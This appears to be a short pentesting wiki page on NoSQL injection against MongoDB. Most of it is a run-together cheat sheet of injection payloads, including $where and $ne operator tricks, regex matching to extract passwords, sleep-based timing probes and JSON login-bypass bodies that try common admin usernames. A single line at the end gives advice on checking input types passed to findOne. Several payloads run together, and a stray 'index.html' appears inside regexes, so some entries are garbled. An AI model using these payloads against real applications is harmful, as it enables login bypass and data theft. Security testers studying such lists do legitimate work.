Link to this headingNoSQL

NOSQL-injection
hacktricks Wiki

Payloads:

true, $where: '1 == 1' , $where: '1 == 1' $where: '1 == 1' ', $where: '1 == 1 1, $where: '1 == 1' { $ne: 1 } ', $or: [ {}, { 'a':'a ' } ], $comment:'successful MongoDB injection' db.injection.insert({success:1}); db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 || 1==1 || 1==1// || 1==1%00 }, { password : /.*/ } ' && this.password.match(/.*/index.html)//+%00 ' && this.passwordzz.match(/.*/index.html)//+%00 '%20%26%26%20this.password.match(/.*/index.html)//+%00 '%20%26%26%20this.passwordzz.match(/.*/index.html)//+%00 {$gt: ''} [$ne]=1 ';sleep(5000); ';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000); {"username": {"$ne": null}, "password": {"$ne": null}} {"username": {"$ne": "foo"}, "password": {"$ne": "bar"}} {"username": {"$gt": undefined}, "password": {"$gt": undefined}} {"username": {"$gt":""}, "password": {"$gt":""}} {"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}

Link to this headingFindOne Injection

Insure that the incoming variable that is going into the FindOne function is a string and not a object. If it is an object then it can be passed to the findOne function and preform injections.